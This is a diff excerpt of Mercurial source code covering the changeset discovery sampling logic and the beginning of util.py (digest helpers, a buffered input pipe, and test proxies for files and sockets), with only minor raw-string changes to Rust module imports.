168 168 def undecided(self):
169 169 if self._undecided is not None:
170 170 return self._undecided
171 171 self._undecided = set(self._common.missingancestors(self._targetheads))
172 172 return self._undecided
173 173
174 174 def stats(self):
175 175 return {
176 176 'undecided': len(self.undecided),
177 177 }
178 178
179 179 def commonheads(self):
180 180 """the heads of the known common set"""
181 181 # heads(common) == heads(common.bases) since common represents
182 182 # common.bases and all its ancestors
183 183 return self._common.basesheads()
184 184
185 185 def _parentsgetter(self):
186 186 getrev = self._repo.changelog.index.__getitem__
187 187 def getparents(r):
188 188 return getrev(r)[5:7]
189 189 return getparents
190 190
191 191 def _childrengetter(self):
192 192
193 193 if self._childrenmap is not None:
194 194 # During discovery, the `undecided` set keeps shrinking.
195 195 # Therefore, the map computed for an iteration N will be
196 196 # valid for iteration N+1. Instead of computing the same
197 197 # data over and over, we cache it the first time.
198 198 return self._childrenmap.__getitem__
199 199
200 200 # _updatesample() essentially does iteration over revisions to look
201 201 # up their children. This lookup is expensive and doing it in a loop is
202 202 # quadratic. We precompute the children for all relevant revisions and
203 203 # make the lookup in _updatesample() a simple dict lookup.
204 204 self._childrenmap = children = {}
205 205
206 206 parentrevs = self._parentsgetter()
207 207 revs = self.undecided
208 208
209 209 for rev in sorted(revs):
210 210 # Always ensure revision has an entry so we don't need to worry
211 211 # about missing keys.
212 212 children[rev] = []
213 213 for prev in parentrevs(rev):
214 214 if prev == nullrev:
215 215 continue
216 216 c = children.get(prev)
217 217 if c is not None:
218 218 c.append(rev)
219 219 return children.__getitem__
220 220
221 221 def takequicksample(self, headrevs, size):
222 222 """takes a quick sample of size <size>
223 223
224 224 It is meant for initial sampling and focuses on querying heads and close
225 225 ancestors of heads.
226 226
227 227 :headrevs: set of head revisions in local DAG to consider
228 228 :size: the maximum size of the sample"""
229 229 revs = self.undecided
230 230 if len(revs) <= size:
231 231 return list(revs)
232 232 sample = set(self._repo.revs('heads(%ld)', revs))
233 233
234 234 if len(sample) >= size:
235 235 return _limitsample(sample, size, randomize=self.randomize)
236 236
237 237 _updatesample(None, headrevs, sample, self._parentsgetter(),
238 238 quicksamplesize=size)
239 239 return sample
240 240
241 241 def takefullsample(self, headrevs, size):
242 242 revs = self.undecided
243 243 if len(revs) <= size:
244 244 return list(revs)
245 245 repo = self._repo
246 246 sample = set(repo.revs('heads(%ld)', revs))
247 247 parentrevs = self._parentsgetter()
248 248
249 249 # update from heads
250 250 revsheads = sample.copy()
251 251 _updatesample(revs, revsheads, sample, parentrevs)
252 252
253 253 # update from roots
254 254 revsroots = set(repo.revs('roots(%ld)', revs))
255 255 childrenrevs = self._childrengetter()
256 256 _updatesample(revs, revsroots, sample, childrenrevs)
257 257 assert sample
258 258
259 259 if not self._respectsize:
260 260 size = max(size, min(len(revsroots), len(revsheads)))
261 261
262 262 sample = _limitsample(sample, size, randomize=self.randomize)
263 263 if len(sample) < size:
264 264 more = size - len(sample)
265 265 takefrom = list(revs - sample)
266 266 if self.randomize:
267 267 sample.update(random.sample(takefrom, more))
268 268 else:
269 269 takefrom.sort()
270 270 sample.update(takefrom[:more])
271 271 return sample
272 272
273 partialdiscovery = policy.importrust('discovery',
274 member='PartialDiscovery',
273 partialdiscovery = policy.importrust(r'discovery',
274 member=r'PartialDiscovery',
275 275 default=partialdiscovery)
276 276
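Whichever implementation is picked (the pure Python class above or the Rust
`PartialDiscovery`), callers drive it with the same small loop; a hedged
sketch, where `getsample` and `queryremote` are hypothetical placeholders for
the sampling and wire-protocol steps that findcommonheads() performs below:

    def drive(disco, getsample, queryremote):
        # keep sampling until every revision is classified common/missing
        while not disco.iscomplete():
            sample = list(getsample())
            yesno = queryremote(sample)      # the remote's 'known' answers
            disco.addinfo(zip(sample, yesno))
        return disco.commonheads()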
277 277 def findcommonheads(ui, local, remote,
278 278 initialsamplesize=100,
279 279 fullsamplesize=200,
280 280 abortwhenunrelated=True,
281 281 ancestorsof=None,
282 282 samplegrowth=1.05):
283 283 '''Return a tuple (common, anyincoming, remoteheads) used to identify
284 284 missing nodes from or in remote.
285 285 '''
286 286 start = util.timer()
287 287
288 288 roundtrips = 0
289 289 cl = local.changelog
290 290 clnode = cl.node
291 291 clrev = cl.rev
292 292
293 293 if ancestorsof is not None:
294 294 ownheads = [clrev(n) for n in ancestorsof]
295 295 else:
296 296 ownheads = [rev for rev in cl.headrevs() if rev != nullrev]
297 297
298 298 # early exit if we know all the specified remote heads already
299 299 ui.debug("query 1; heads\n")
300 300 roundtrips += 1
301 301 # We also ask remote about all the local heads. That set can be arbitrarily
302 302 # large, so we used to limit its size to `initialsamplesize`. We no longer
303 303 # do so, as it proved counterproductive. The skipped heads could lead to a
304 304 # large "undecided" set, slower to clarify than if we asked the
305 305 # question for all heads right away.
306 306 #
307 307 # We are already fetching all server heads using the `heads` command;
308 308 # sending an equivalent number of heads the other way should not have a
309 309 # significant impact. In addition, it is very likely that we are going to
310 310 # have to issue "known" requests for an equivalent number of revisions in
311 311 # order to decide if these heads are common or missing.
312 312 #
313 313 # A detailed analysis follows below.
314 314 #
315 315 # Case A: local and server both have few heads
316 316 #
317 317 # Ownheads is below initialsamplesize; the limit would not have any effect.
318 318 #
319 319 # Case B: local has few heads and server has many
320 320 #
321 321 # Ownheads is below initialsamplesize; the limit would not have any effect.
322 322 #
323 323 # Case C: local and server both have many heads
324 324 #
325 325 # We now transfer some more data, but not significantly more than is
326 326 # already transferred to carry the server heads.
327 327 #
328 328 # Case D: local has many heads, server has few
329 329 #
330 330 # D.1 local heads are mostly known remotely
331 331 #
332 332 # All the known heads will have been part of a `known` request at some
333 333 # point for the discovery to finish. Sending them all earlier is
334 334 # actually helping.
335 335 #
336 336 # (This case is fairly unlikely; it requires the numerous heads to all
337 337 # be merged server-side into only a few heads.)
338 338 #
339 339 # D.2 local heads are mostly missing remotely
340 340 #
341 341 # To determine that the heads are missing, we'll have to issue `known`
342 342 # requests for them or one of their ancestors. The number of `known`
343 343 # requests will likely be of the same order of magnitude as the number
344 344 # of local heads.
345 345 #
346 346 # The only case where we can be more efficient using `known` requests on
347 347 # ancestors is when all the "missing" local heads are based on a few
348 348 # changesets that are also "missing". This means we would have a "complex"
349 349 # graph (with many heads) attached to, but largely independent of, the
350 350 # "simple" graph on the server. This is a fairly unusual case and has
351 351 # not been met in the wild so far.
352 352 if remote.limitedarguments:
353 353 sample = _limitsample(ownheads, initialsamplesize)
354 354 # indices between sample and externalized version must match
355 355 sample = list(sample)
356 356 else:
357 357 sample = ownheads
358 358
359 359 with remote.commandexecutor() as e:
360 360 fheads = e.callcommand('heads', {})
361 361 fknown = e.callcommand('known', {
362 362 'nodes': [clnode(r) for r in sample],
363 363 })
364 364
365 365 srvheadhashes, yesno = fheads.result(), fknown.result()
366 366
367 367 if cl.tip() == nullid:
368 368 if srvheadhashes != [nullid]:
369 369 return [nullid], True, srvheadhashes
370 370 return [nullid], False, []
371 371
372 372 # start actual discovery (we note this before the next "if" for
373 373 # compatibility reasons)
374 374 ui.status(_("searching for changes\n"))
375 375
376 376 knownsrvheads = [] # revnos of remote heads that are known locally
377 377 for node in srvheadhashes:
378 378 if node == nullid:
379 379 continue
380 380
381 381 try:
382 382 knownsrvheads.append(clrev(node))
383 383 # Catches unknown and filtered nodes.
384 384 except error.LookupError:
385 385 continue
386 386
387 387 if len(knownsrvheads) == len(srvheadhashes):
388 388 ui.debug("all remote heads known locally\n")
389 389 return srvheadhashes, False, srvheadhashes
390 390
391 391 if len(sample) == len(ownheads) and all(yesno):
392 392 ui.note(_("all local heads known remotely\n"))
393 393 ownheadhashes = [clnode(r) for r in ownheads]
394 394 return ownheadhashes, True, srvheadhashes
395 395
396 396 # full blown discovery
397 397
398 398 randomize = ui.configbool('devel', 'discovery.randomize')
399 399 disco = partialdiscovery(local, ownheads, remote.limitedarguments,
400 400 randomize=randomize)
401 401 # treat remote heads (and maybe own heads) as a first implicit sample
402 402 # response
403 403 disco.addcommons(knownsrvheads)
404 404 disco.addinfo(zip(sample, yesno))
405 405
406 406 full = False
407 407 progress = ui.makeprogress(_('searching'), unit=_('queries'))
408 408 while not disco.iscomplete():
409 409
410 410 if full or disco.hasinfo():
411 411 if full:
412 412 ui.note(_("sampling from both directions\n"))
413 413 else:
414 414 ui.debug("taking initial sample\n")
415 415 samplefunc = disco.takefullsample
416 416 targetsize = fullsamplesize
417 417 if not remote.limitedarguments:
418 418 fullsamplesize = int(fullsamplesize * samplegrowth)
419 419 else:
420 420 # use even cheaper initial sample
421 421 ui.debug("taking quick initial sample\n")
422 422 samplefunc = disco.takequicksample
423 423 targetsize = initialsamplesize
424 424 sample = samplefunc(ownheads, targetsize)
425 425
426 426 roundtrips += 1
427 427 progress.update(roundtrips)
428 428 stats = disco.stats()
429 429 ui.debug("query %i; still undecided: %i, sample size is: %i\n"
430 430 % (roundtrips, stats['undecided'], len(sample)))
431 431
432 432 # indices between sample and externalized version must match
433 433 sample = list(sample)
434 434
435 435 with remote.commandexecutor() as e:
436 436 yesno = e.callcommand('known', {
437 437 'nodes': [clnode(r) for r in sample],
438 438 }).result()
439 439
440 440 full = True
441 441
442 442 disco.addinfo(zip(sample, yesno))
443 443
444 444 result = disco.commonheads()
445 445 elapsed = util.timer() - start
446 446 progress.complete()
447 447 ui.debug("%d total queries in %.4fs\n" % (roundtrips, elapsed))
448 448 msg = ('found %d common and %d unknown server heads,'
449 449 ' %d roundtrips in %.4fs\n')
450 450 missing = set(result) - set(knownsrvheads)
451 451 ui.log('discovery', msg, len(result), len(missing), roundtrips,
452 452 elapsed)
453 453
454 454 if not result and srvheadhashes != [nullid]:
455 455 if abortwhenunrelated:
456 456 raise error.Abort(_("repository is unrelated"))
457 457 else:
458 458 ui.warn(_("warning: repository is unrelated\n"))
459 459 return ({nullid}, True, srvheadhashes,)
460 460
461 461 anyincoming = (srvheadhashes != [nullid])
462 462 result = {clnode(r) for r in result}
463 463 return result, anyincoming, srvheadhashes
@@ -1,3326 +1,3326 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import (
38 38 attr,
39 39 )
40 40 from hgdemandimport import tracing
41 41 from . import (
42 42 encoding,
43 43 error,
44 44 i18n,
45 45 node as nodemod,
46 46 policy,
47 47 pycompat,
48 48 urllibcompat,
49 49 )
50 50 from .utils import (
51 51 compression,
52 52 procutil,
53 53 stringutil,
54 54 )
55 55
56 rustdirs = policy.importrust('dirstate', 'Dirs')
56 rustdirs = policy.importrust(r'dirstate', r'Dirs')
57 57
58 58 base85 = policy.importmod(r'base85')
59 59 osutil = policy.importmod(r'osutil')
60 60 parsers = policy.importmod(r'parsers')
61 61
62 62 b85decode = base85.b85decode
63 63 b85encode = base85.b85encode
64 64
65 65 cookielib = pycompat.cookielib
66 66 httplib = pycompat.httplib
67 67 pickle = pycompat.pickle
68 68 safehasattr = pycompat.safehasattr
69 69 socketserver = pycompat.socketserver
70 70 bytesio = pycompat.bytesio
71 71 # TODO deprecate stringio name, as it is a lie on Python 3.
72 72 stringio = bytesio
73 73 xmlrpclib = pycompat.xmlrpclib
74 74
75 75 httpserver = urllibcompat.httpserver
76 76 urlerr = urllibcompat.urlerr
77 77 urlreq = urllibcompat.urlreq
78 78
79 79 # workaround for win32mbcs
80 80 _filenamebytestr = pycompat.bytestr
81 81
82 82 if pycompat.iswindows:
83 83 from . import windows as platform
84 84 else:
85 85 from . import posix as platform
86 86
87 87 _ = i18n._
88 88
89 89 bindunixsocket = platform.bindunixsocket
90 90 cachestat = platform.cachestat
91 91 checkexec = platform.checkexec
92 92 checklink = platform.checklink
93 93 copymode = platform.copymode
94 94 expandglobs = platform.expandglobs
95 95 getfsmountpoint = platform.getfsmountpoint
96 96 getfstype = platform.getfstype
97 97 groupmembers = platform.groupmembers
98 98 groupname = platform.groupname
99 99 isexec = platform.isexec
100 100 isowner = platform.isowner
101 101 listdir = osutil.listdir
102 102 localpath = platform.localpath
103 103 lookupreg = platform.lookupreg
104 104 makedir = platform.makedir
105 105 nlinks = platform.nlinks
106 106 normpath = platform.normpath
107 107 normcase = platform.normcase
108 108 normcasespec = platform.normcasespec
109 109 normcasefallback = platform.normcasefallback
110 110 openhardlinks = platform.openhardlinks
111 111 oslink = platform.oslink
112 112 parsepatchoutput = platform.parsepatchoutput
113 113 pconvert = platform.pconvert
114 114 poll = platform.poll
115 115 posixfile = platform.posixfile
116 116 readlink = platform.readlink
117 117 rename = platform.rename
118 118 removedirs = platform.removedirs
119 119 samedevice = platform.samedevice
120 120 samefile = platform.samefile
121 121 samestat = platform.samestat
122 122 setflags = platform.setflags
123 123 split = platform.split
124 124 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
125 125 statisexec = platform.statisexec
126 126 statislink = platform.statislink
127 127 umask = platform.umask
128 128 unlink = platform.unlink
129 129 username = platform.username
130 130
131 131 # small compat layer
132 132 compengines = compression.compengines
133 133 SERVERROLE = compression.SERVERROLE
134 134 CLIENTROLE = compression.CLIENTROLE
135 135
136 136 try:
137 137 recvfds = osutil.recvfds
138 138 except AttributeError:
139 139 pass
140 140
141 141 # Python compatibility
142 142
143 143 _notset = object()
144 144
145 145 def bitsfrom(container):
146 146 bits = 0
147 147 for bit in container:
148 148 bits |= bit
149 149 return bits
150 150
151 151 # Python 2.6 still has deprecation warnings enabled by default. We do not want
152 152 # to display anything to a standard user, so detect if we are running tests and
153 153 # only use Python deprecation warnings in this case.
154 154 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
155 155 if _dowarn:
156 156 # explicitly unfilter our warning for python 2.7
157 157 #
158 158 # The option of setting PYTHONWARNINGS in the test runner was investigated.
159 159 # However, module name set through PYTHONWARNINGS was exactly matched, so
160 160 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
161 161 # makes the whole PYTHONWARNINGS thing useless for our use case.
162 162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
163 163 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
164 164 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
165 165 if _dowarn and pycompat.ispy3:
166 166 # silence warning emitted by passing user string to re.sub()
167 167 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
168 168 r'mercurial')
169 169 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
170 170 DeprecationWarning, r'mercurial')
171 171 # TODO: reinvent imp.is_frozen()
172 172 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
173 173 DeprecationWarning, r'mercurial')
174 174
175 175 def nouideprecwarn(msg, version, stacklevel=1):
176 176 """Issue an python native deprecation warning
177 177
178 178 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
179 179 """
180 180 if _dowarn:
181 181 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
182 182 " update your code.)") % version
183 183 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
184 184
185 185 DIGESTS = {
186 186 'md5': hashlib.md5,
187 187 'sha1': hashlib.sha1,
188 188 'sha512': hashlib.sha512,
189 189 }
190 190 # List of digest types from strongest to weakest
191 191 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
192 192
193 193 for k in DIGESTS_BY_STRENGTH:
194 194 assert k in DIGESTS
195 195
196 196 class digester(object):
197 197 """helper to compute digests.
198 198
199 199 This helper can be used to compute one or more digests given their name.
200 200
201 201 >>> d = digester([b'md5', b'sha1'])
202 202 >>> d.update(b'foo')
203 203 >>> [k for k in sorted(d)]
204 204 ['md5', 'sha1']
205 205 >>> d[b'md5']
206 206 'acbd18db4cc2f85cedef654fccc4a4d8'
207 207 >>> d[b'sha1']
208 208 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
209 209 >>> digester.preferred([b'md5', b'sha1'])
210 210 'sha1'
211 211 """
212 212
213 213 def __init__(self, digests, s=''):
214 214 self._hashes = {}
215 215 for k in digests:
216 216 if k not in DIGESTS:
217 217 raise error.Abort(_('unknown digest type: %s') % k)
218 218 self._hashes[k] = DIGESTS[k]()
219 219 if s:
220 220 self.update(s)
221 221
222 222 def update(self, data):
223 223 for h in self._hashes.values():
224 224 h.update(data)
225 225
226 226 def __getitem__(self, key):
227 227 if key not in DIGESTS:
228 228 raise error.Abort(_('unknown digest type: %s') % key)
229 229 return nodemod.hex(self._hashes[key].digest())
230 230
231 231 def __iter__(self):
232 232 return iter(self._hashes)
233 233
234 234 @staticmethod
235 235 def preferred(supported):
236 236 """returns the strongest digest type in both supported and DIGESTS."""
237 237
238 238 for k in DIGESTS_BY_STRENGTH:
239 239 if k in supported:
240 240 return k
241 241 return None
242 242
243 243 class digestchecker(object):
244 244 """file handle wrapper that additionally checks content against a given
245 245 size and digests.
246 246
247 247 d = digestchecker(fh, size, {'md5': '...'})
248 248
249 249 When multiple digests are given, all of them are validated.
250 250 """
251 251
252 252 def __init__(self, fh, size, digests):
253 253 self._fh = fh
254 254 self._size = size
255 255 self._got = 0
256 256 self._digests = dict(digests)
257 257 self._digester = digester(self._digests.keys())
258 258
259 259 def read(self, length=-1):
260 260 content = self._fh.read(length)
261 261 self._digester.update(content)
262 262 self._got += len(content)
263 263 return content
264 264
265 265 def validate(self):
266 266 if self._size != self._got:
267 267 raise error.Abort(_('size mismatch: expected %d, got %d') %
268 268 (self._size, self._got))
269 269 for k, v in self._digests.items():
270 270 if v != self._digester[k]:
271 271 # i18n: first parameter is a digest name
272 272 raise error.Abort(_('%s mismatch: expected %s, got %s') %
273 273 (k, v, self._digester[k]))
274 274
275 275 try:
276 276 buffer = buffer
277 277 except NameError:
278 278 def buffer(sliceable, offset=0, length=None):
279 279 if length is not None:
280 280 return memoryview(sliceable)[offset:offset + length]
281 281 return memoryview(sliceable)[offset:]
282 282
283 283 _chunksize = 4096
284 284
285 285 class bufferedinputpipe(object):
286 286 """a manually buffered input pipe
287 287
288 288 Python will not let us use buffered IO and lazy reading with 'polling' at
289 289 the same time. We cannot probe the buffer state and select will not detect
290 290 that data are ready to read if they are already buffered.
291 291
292 292 This class lets us work around that by implementing its own buffering
293 293 (allowing efficient readline) while offering a way to know if the buffer is
294 294 empty from the output (allowing collaboration of the buffer with polling).
295 295
296 296 This class lives in the 'util' module because it makes use of the 'os'
297 297 module from the python stdlib.
298 298 """
299 299 def __new__(cls, fh):
300 300 # If we receive a fileobjectproxy, we need to use a variation of this
301 301 # class that notifies observers about activity.
302 302 if isinstance(fh, fileobjectproxy):
303 303 cls = observedbufferedinputpipe
304 304
305 305 return super(bufferedinputpipe, cls).__new__(cls)
306 306
307 307 def __init__(self, input):
308 308 self._input = input
309 309 self._buffer = []
310 310 self._eof = False
311 311 self._lenbuf = 0
312 312
313 313 @property
314 314 def hasbuffer(self):
315 315 """True is any data is currently buffered
316 316
317 317 This will be used externally a pre-step for polling IO. If there is
318 318 already data then no polling should be set in place."""
319 319 return bool(self._buffer)
320 320
321 321 @property
322 322 def closed(self):
323 323 return self._input.closed
324 324
325 325 def fileno(self):
326 326 return self._input.fileno()
327 327
328 328 def close(self):
329 329 return self._input.close()
330 330
331 331 def read(self, size):
332 332 while (not self._eof) and (self._lenbuf < size):
333 333 self._fillbuffer()
334 334 return self._frombuffer(size)
335 335
336 336 def unbufferedread(self, size):
337 337 if not self._eof and self._lenbuf == 0:
338 338 self._fillbuffer(max(size, _chunksize))
339 339 return self._frombuffer(min(self._lenbuf, size))
340 340
341 341 def readline(self, *args, **kwargs):
342 342 if len(self._buffer) > 1:
343 343 # this should not happen because both read and readline end with a
344 344 # _frombuffer call that collapses it.
345 345 self._buffer = [''.join(self._buffer)]
346 346 self._lenbuf = len(self._buffer[0])
347 347 lfi = -1
348 348 if self._buffer:
349 349 lfi = self._buffer[-1].find('\n')
350 350 while (not self._eof) and lfi < 0:
351 351 self._fillbuffer()
352 352 if self._buffer:
353 353 lfi = self._buffer[-1].find('\n')
354 354 size = lfi + 1
355 355 if lfi < 0: # end of file
356 356 size = self._lenbuf
357 357 elif len(self._buffer) > 1:
358 358 # we need to take previous chunks into account
359 359 size += self._lenbuf - len(self._buffer[-1])
360 360 return self._frombuffer(size)
361 361
362 362 def _frombuffer(self, size):
363 363 """return at most 'size' data from the buffer
364 364
365 365 The data are removed from the buffer."""
366 366 if size == 0 or not self._buffer:
367 367 return ''
368 368 buf = self._buffer[0]
369 369 if len(self._buffer) > 1:
370 370 buf = ''.join(self._buffer)
371 371
372 372 data = buf[:size]
373 373 buf = buf[len(data):]
374 374 if buf:
375 375 self._buffer = [buf]
376 376 self._lenbuf = len(buf)
377 377 else:
378 378 self._buffer = []
379 379 self._lenbuf = 0
380 380 return data
381 381
382 382 def _fillbuffer(self, size=_chunksize):
383 383 """read data to the buffer"""
384 384 data = os.read(self._input.fileno(), size)
385 385 if not data:
386 386 self._eof = True
387 387 else:
388 388 self._lenbuf += len(data)
389 389 self._buffer.append(data)
390 390
391 391 return data
392 392
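A hedged sketch of the polling collaboration the docstring above describes
(`readavailable` is illustrative and not part of this module):

    import select

    def readavailable(pipe, size=4096):
        # Drain our own buffer first; poll the OS only when it is empty,
        # since select() cannot see data already sitting in the buffer.
        if pipe.hasbuffer:
            return pipe.unbufferedread(size)
        r, _w, _x = select.select([pipe.fileno()], [], [], 0)
        if r:
            return pipe.unbufferedread(size)
        return b''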
393 393 def mmapread(fp):
394 394 try:
395 395 fd = getattr(fp, 'fileno', lambda: fp)()
396 396 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
397 397 except ValueError:
398 398 # Empty files cannot be mmapped, but mmapread should still work. Check
399 399 # if the file is empty, and if so, return an empty buffer.
400 400 if os.fstat(fd).st_size == 0:
401 401 return ''
402 402 raise
403 403
404 404 class fileobjectproxy(object):
405 405 """A proxy around file objects that tells a watcher when events occur.
406 406
407 407 This type is intended to only be used for testing purposes. Think hard
408 408 before using it in important code.
409 409 """
410 410 __slots__ = (
411 411 r'_orig',
412 412 r'_observer',
413 413 )
414 414
415 415 def __init__(self, fh, observer):
416 416 object.__setattr__(self, r'_orig', fh)
417 417 object.__setattr__(self, r'_observer', observer)
418 418
419 419 def __getattribute__(self, name):
420 420 ours = {
421 421 r'_observer',
422 422
423 423 # IOBase
424 424 r'close',
425 425 # closed if a property
426 426 r'fileno',
427 427 r'flush',
428 428 r'isatty',
429 429 r'readable',
430 430 r'readline',
431 431 r'readlines',
432 432 r'seek',
433 433 r'seekable',
434 434 r'tell',
435 435 r'truncate',
436 436 r'writable',
437 437 r'writelines',
438 438 # RawIOBase
439 439 r'read',
440 440 r'readall',
441 441 r'readinto',
442 442 r'write',
443 443 # BufferedIOBase
444 444 # raw is a property
445 445 r'detach',
446 446 # read defined above
447 447 r'read1',
448 448 # readinto defined above
449 449 # write defined above
450 450 }
451 451
452 452 # We only observe some methods.
453 453 if name in ours:
454 454 return object.__getattribute__(self, name)
455 455
456 456 return getattr(object.__getattribute__(self, r'_orig'), name)
457 457
458 458 def __nonzero__(self):
459 459 return bool(object.__getattribute__(self, r'_orig'))
460 460
461 461 __bool__ = __nonzero__
462 462
463 463 def __delattr__(self, name):
464 464 return delattr(object.__getattribute__(self, r'_orig'), name)
465 465
466 466 def __setattr__(self, name, value):
467 467 return setattr(object.__getattribute__(self, r'_orig'), name, value)
468 468
469 469 def __iter__(self):
470 470 return object.__getattribute__(self, r'_orig').__iter__()
471 471
472 472 def _observedcall(self, name, *args, **kwargs):
473 473 # Call the original object.
474 474 orig = object.__getattribute__(self, r'_orig')
475 475 res = getattr(orig, name)(*args, **kwargs)
476 476
477 477 # Call a method on the observer of the same name with arguments
478 478 # so it can react, log, etc.
479 479 observer = object.__getattribute__(self, r'_observer')
480 480 fn = getattr(observer, name, None)
481 481 if fn:
482 482 fn(res, *args, **kwargs)
483 483
484 484 return res
485 485
486 486 def close(self, *args, **kwargs):
487 487 return object.__getattribute__(self, r'_observedcall')(
488 488 r'close', *args, **kwargs)
489 489
490 490 def fileno(self, *args, **kwargs):
491 491 return object.__getattribute__(self, r'_observedcall')(
492 492 r'fileno', *args, **kwargs)
493 493
494 494 def flush(self, *args, **kwargs):
495 495 return object.__getattribute__(self, r'_observedcall')(
496 496 r'flush', *args, **kwargs)
497 497
498 498 def isatty(self, *args, **kwargs):
499 499 return object.__getattribute__(self, r'_observedcall')(
500 500 r'isatty', *args, **kwargs)
501 501
502 502 def readable(self, *args, **kwargs):
503 503 return object.__getattribute__(self, r'_observedcall')(
504 504 r'readable', *args, **kwargs)
505 505
506 506 def readline(self, *args, **kwargs):
507 507 return object.__getattribute__(self, r'_observedcall')(
508 508 r'readline', *args, **kwargs)
509 509
510 510 def readlines(self, *args, **kwargs):
511 511 return object.__getattribute__(self, r'_observedcall')(
512 512 r'readlines', *args, **kwargs)
513 513
514 514 def seek(self, *args, **kwargs):
515 515 return object.__getattribute__(self, r'_observedcall')(
516 516 r'seek', *args, **kwargs)
517 517
518 518 def seekable(self, *args, **kwargs):
519 519 return object.__getattribute__(self, r'_observedcall')(
520 520 r'seekable', *args, **kwargs)
521 521
522 522 def tell(self, *args, **kwargs):
523 523 return object.__getattribute__(self, r'_observedcall')(
524 524 r'tell', *args, **kwargs)
525 525
526 526 def truncate(self, *args, **kwargs):
527 527 return object.__getattribute__(self, r'_observedcall')(
528 528 r'truncate', *args, **kwargs)
529 529
530 530 def writable(self, *args, **kwargs):
531 531 return object.__getattribute__(self, r'_observedcall')(
532 532 r'writable', *args, **kwargs)
533 533
534 534 def writelines(self, *args, **kwargs):
535 535 return object.__getattribute__(self, r'_observedcall')(
536 536 r'writelines', *args, **kwargs)
537 537
538 538 def read(self, *args, **kwargs):
539 539 return object.__getattribute__(self, r'_observedcall')(
540 540 r'read', *args, **kwargs)
541 541
542 542 def readall(self, *args, **kwargs):
543 543 return object.__getattribute__(self, r'_observedcall')(
544 544 r'readall', *args, **kwargs)
545 545
546 546 def readinto(self, *args, **kwargs):
547 547 return object.__getattribute__(self, r'_observedcall')(
548 548 r'readinto', *args, **kwargs)
549 549
550 550 def write(self, *args, **kwargs):
551 551 return object.__getattribute__(self, r'_observedcall')(
552 552 r'write', *args, **kwargs)
553 553
554 554 def detach(self, *args, **kwargs):
555 555 return object.__getattribute__(self, r'_observedcall')(
556 556 r'detach', *args, **kwargs)
557 557
558 558 def read1(self, *args, **kwargs):
559 559 return object.__getattribute__(self, r'_observedcall')(
560 560 r'read1', *args, **kwargs)
561 561
562 562 class observedbufferedinputpipe(bufferedinputpipe):
563 563 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
564 564
565 565 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
566 566 bypass ``fileobjectproxy``. Because of this, we need to make
567 567 ``bufferedinputpipe`` aware of these operations.
568 568
569 569 This variation of ``bufferedinputpipe`` can notify observers about
570 570 ``os.read()`` events. It also re-publishes other events, such as
571 571 ``read()`` and ``readline()``.
572 572 """
573 573 def _fillbuffer(self):
574 574 res = super(observedbufferedinputpipe, self)._fillbuffer()
575 575
576 576 fn = getattr(self._input._observer, r'osread', None)
577 577 if fn:
578 578 fn(res, _chunksize)
579 579
580 580 return res
581 581
582 582 # We use different observer methods because the operation isn't
583 583 # performed on the actual file object but on us.
584 584 def read(self, size):
585 585 res = super(observedbufferedinputpipe, self).read(size)
586 586
587 587 fn = getattr(self._input._observer, r'bufferedread', None)
588 588 if fn:
589 589 fn(res, size)
590 590
591 591 return res
592 592
593 593 def readline(self, *args, **kwargs):
594 594 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
595 595
596 596 fn = getattr(self._input._observer, r'bufferedreadline', None)
597 597 if fn:
598 598 fn(res)
599 599
600 600 return res
601 601
602 602 PROXIED_SOCKET_METHODS = {
603 603 r'makefile',
604 604 r'recv',
605 605 r'recvfrom',
606 606 r'recvfrom_into',
607 607 r'recv_into',
608 608 r'send',
609 609 r'sendall',
610 610 r'sendto',
611 611 r'setblocking',
612 612 r'settimeout',
613 613 r'gettimeout',
614 614 r'setsockopt',
615 615 }
616 616
617 617 class socketproxy(object):
618 618 """A proxy around a socket that tells a watcher when events occur.
619 619
620 620 This is like ``fileobjectproxy`` except for sockets.
621 621
622 622 This type is intended to only be used for testing purposes. Think hard
623 623 before using it in important code.
624 624 """
625 625 __slots__ = (
626 626 r'_orig',
627 627 r'_observer',
628 628 )
629 629
630 630 def __init__(self, sock, observer):
631 631 object.__setattr__(self, r'_orig', sock)
632 632 object.__setattr__(self, r'_observer', observer)
633 633
634 634 def __getattribute__(self, name):
635 635 if name in PROXIED_SOCKET_METHODS:
636 636 return object.__getattribute__(self, name)
637 637
638 638 return getattr(object.__getattribute__(self, r'_orig'), name)
639 639
640 640 def __delattr__(self, name):
641 641 return delattr(object.__getattribute__(self, r'_orig'), name)
642 642
643 643 def __setattr__(self, name, value):
644 644 return setattr(object.__getattribute__(self, r'_orig'), name, value)
645 645
646 646 def __nonzero__(self):
647 647 return bool(object.__getattribute__(self, r'_orig'))
648 648
